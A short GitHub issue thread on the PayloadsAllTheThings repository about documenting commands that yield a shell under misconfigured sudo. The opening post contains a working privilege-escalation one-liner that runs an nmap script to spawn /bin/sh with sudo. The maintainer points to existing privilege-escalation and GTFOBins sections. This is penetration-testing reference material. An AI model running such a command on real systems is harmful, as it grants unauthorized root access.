### ISSUE TITLE
Add list of commands wich can lead to a shell

### ISSUE THREAD

**Issue by sibwara** [swisskyrepo/PayloadsAllTheThings#80]
Some commands can be diverted to give shell and many sysadmins do not know that and can give sudo access or setuid bit:  

```echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse```    

Sell also https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html section Abusing sudo-rights

**Comment by swisskyrepo** [comment]
It is already mentioned on : 

- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md#sudo
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md#gtfobins

**Comment by sibwara** [comment]
Sorry I didn't realize that the GTFObins was what I talked about
